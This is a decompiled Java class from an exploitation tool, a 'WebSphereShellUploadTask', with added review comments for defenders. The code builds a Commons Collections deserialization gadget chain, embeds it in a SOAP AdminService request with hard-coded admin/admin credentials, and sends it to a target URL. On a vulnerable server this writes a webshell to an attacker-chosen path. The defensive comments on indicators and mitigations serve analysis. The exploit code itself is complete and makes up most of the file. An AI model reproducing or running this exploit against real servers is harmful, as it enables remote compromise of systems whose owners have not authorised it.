package serialize.exploittask.websphere;

import com.linar.jintegra.IJintegraJvm2;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;
import javafx.concurrent.Task;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import serialize.Utils.HttpHelper;
import serialize.Utils.UrlTools;
import weblogic.iiop.Utils;

/* loaded from: input_file:serialize/exploittask/websphere/WebSphereShellUploadTask.class */
/**
 * Decompiled (JADX) JavaFX background task from an exploitation tool.
 *
 * <p>What the visible code does: it serializes a Commons Collections 3.x
 * transformer chain wrapped in a {@code sun.reflect.annotation.AnnotationInvocationHandler},
 * hands the bytes to {@code WebSphereUtils.getBase64Payload} together with a SOAP
 * {@code AdminService} invoke envelope, and posts the result to the target URL through
 * {@code HttpHelper.getWebSphereResponse}. The chain, when deserialized on a vulnerable
 * server, opens a {@link FileOutputStream} on {@code fileUpPath} and writes
 * {@code webshellPayload} into it, i.e. an arbitrary file write driven by untrusted
 * deserialization.
 *
 * <p>Review notes for defenders (analysis of this sample, not part of its behavior):
 * <ul>
 *   <li>Indicators visible in the request template: a SOAP envelope addressed to
 *       {@code urn:AdminService}, header attributes {@code WASRemoteRuntimeVersion="6.1.0.0"}
 *       and {@code SecurityEnabled="true"}, the literal credentials {@code admin}/{@code admin},
 *       and Base64 element bodies starting with {@code rO0AB} (the Base64 form of the Java
 *       serialization stream header {@code AC ED 00 05}).</li>
 *   <li>The gadget depends on {@code InvokerTransformer} being deserializable and on
 *       {@code AnnotationInvocationHandler.readObject} calling {@code setValue} on the wrapped
 *       map's entries. Commons Collections 3.2.2 and later refuse to deserialize
 *       {@code InvokerTransformer} by default, later JDK 8 updates changed
 *       {@code AnnotationInvocationHandler}, and a JEP 290 {@code ObjectInputFilter} allow-list
 *       blocks the classes outright.</li>
 *   <li>Host-side, the effect is a file created by the application-server process at an
 *       attacker-chosen path; file-integrity monitoring on web-accessible directories and
 *       restricting network access to the administrative SOAP endpoint cover that stage.</li>
 * </ul>
 */
public class WebSphereShellUploadTask extends Task<Void> {
    // Base URL of the server the request is sent to (normalised via UrlTools in call()).
    private final String targetUrl;
    // Raw bytes that the deserialization gadget writes to fileUpPath on the remote side.
    private final byte[] webshellPayload;
    // Remote filesystem path passed to the FileOutputStream(String) constructor inside the gadget.
    private final String fileUpPath;
    // SOAP AdminService "invoke" envelope used as the request template. Visible details:
    //  - hard-coded admin/admin credentials in the SOAP header;
    //  - <objectname> holds a run of '$' characters, presumably a placeholder that
    //    WebSphereUtils.getBase64Payload replaces with the encoded gadget (helper not shown; confirm);
    //  - <params> and <signature> carry fixed Base64 blobs that begin with the Java
    //    serialization magic ("rO0AB").
    // NOTE(review): this field is not referenced anywhere else in the class as shown; call() carries
    // what appears to be the same literal inlined, most likely a decompiler constant-inlining artifact.
    final String requestString = "<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"6.1.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">\n<username>admin</username>\n<password>admin</password>\n<LoginMethod>BasicAuth</LoginMethod>\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">$$$$$$$$$$$$$$</objectname>\n<operationname xsi:type=\"xsd:string\">getProductVersion</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAF0AARCQVNF</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ABBqYXZhLmxhbmcuU3RyaW5n</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>";

    /**
     * Stores the task inputs; no validation is performed on any of them.
     *
     * @param str  target URL, kept as {@code targetUrl}
     * @param str2 remote file path the gadget writes to, kept as {@code fileUpPath}
     * @param bArr bytes the gadget writes, kept by reference (not copied) as {@code webshellPayload}
     */
    public WebSphereShellUploadTask(String str, String str2, byte[] bArr) {
        this.targetUrl = str;
        this.fileUpPath = str2;
        this.webshellPayload = bArr;
    }

    /**
     * Builds the serialized gadget, embeds it in the SOAP template and sends one request.
     *
     * <p>The server's response is discarded: the return value of {@code getWebSphereResponse}
     * is not inspected, so the status message below is set whether or not the write happened.
     *
     * @return always {@code null}
     * @throws Exception anything thrown while building the payload or sending the request
     */
    /* JADX INFO: Access modifiers changed from: protected */
    /* JADX WARN: Can't rename method to resolve collision */
    @Override // javafx.concurrent.Task
    public Void call() throws Exception {
        // Request goes to the normalised target URL plus "/"; the body is produced by
        // WebSphereUtils.getBase64Payload(template, gadgetBytes), whose substitution logic is
        // outside this file (presumably Base64-encodes the bytes into the template; confirm).
        HttpHelper.getInstance().getWebSphereResponse(String.valueOf(UrlTools.getInstance().getTargetUrl(this.targetUrl)) + "/", WebSphereUtils.getBase64Payload("<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"6.1.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">\n<username>admin</username>\n<password>admin</password>\n<LoginMethod>BasicAuth</LoginMethod>\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">$$$$$$$$$$$$$$</objectname>\n<operationname xsi:type=\"xsd:string\">getProductVersion</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAF0AARCQVNF</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ABBqYXZhLmxhbmcuU3RyaW5n</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>", getUpFilePayload()));
        // Status text shown in the tool's UI; it translates to "Upload finished, please connect and test".
        updateMessage("上传完毕，请连接测试……");
        return null;
    }

    /**
     * Serializes the file-write gadget and returns the raw Java serialization stream.
     *
     * <p>Nothing is written locally by this method: the transformer chain is only attached as
     * the value transformer of a {@code TransformedMap}, and the resulting handler object is
     * serialized, not invoked.
     *
     * @return bytes produced by {@link ObjectOutputStream#writeObject} for the handler instance
     * @throws Exception on reflection failures (for example when the JDK blocks access to
     *         {@code sun.reflect.annotation.AnnotationInvocationHandler}) or serialization errors
     */
    private byte[] getUpFilePayload() throws Exception {
        // Transformer chain, in order:
        //   1. ConstantTransformer     -> yields FileOutputStream.class
        //   2. InvokerTransformer      -> getConstructor(String.class) on that class
        //   3. InvokerTransformer      -> method named by IJintegraJvm2.DISPID_1_NAME with {fileUpPath}
        //   4. InvokerTransformer      -> method named by Utils.WRITE_METHOD with webshellPayload
        // NOTE(review): the two constant names in steps 3 and 4 were substituted by the decompiler
        // for string literals of equal value; from the argument shapes they are presumably
        // "newInstance" and "write" - confirm against the referenced classes.
        ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{new ConstantTransformer(FileOutputStream.class), new InvokerTransformer("getConstructor", new Class[]{Class[].class}, new Object[]{new Class[]{String.class}}), new InvokerTransformer(IJintegraJvm2.DISPID_1_NAME, new Class[]{Object[].class}, new Object[]{new Object[]{this.fileUpPath}}), new InvokerTransformer(Utils.WRITE_METHOD, new Class[]{byte[].class}, new Object[]{this.webshellPayload})});
        // The single "value" entry lines up with the value() member of the Retention annotation
        // used below.
        HashMap hashMap = new HashMap();
        hashMap.put("value", "value");
        // Key transformer is null; the chain is installed as the value transformer only.
        Map decorate = TransformedMap.decorate(hashMap, null, chainedTransformer);
        // The handler's constructor is not public, hence the reflective lookup and setAccessible.
        Constructor<?> declaredConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        Object newInstance = declaredConstructor.newInstance(Retention.class, decorate);
        // Initial buffer capacity is 10 bytes; ByteArrayOutputStream grows as needed.
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(10);
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(newInstance);
        objectOutputStream.flush();
        objectOutputStream.close();
        return byteArrayOutputStream.toByteArray();
    }
}
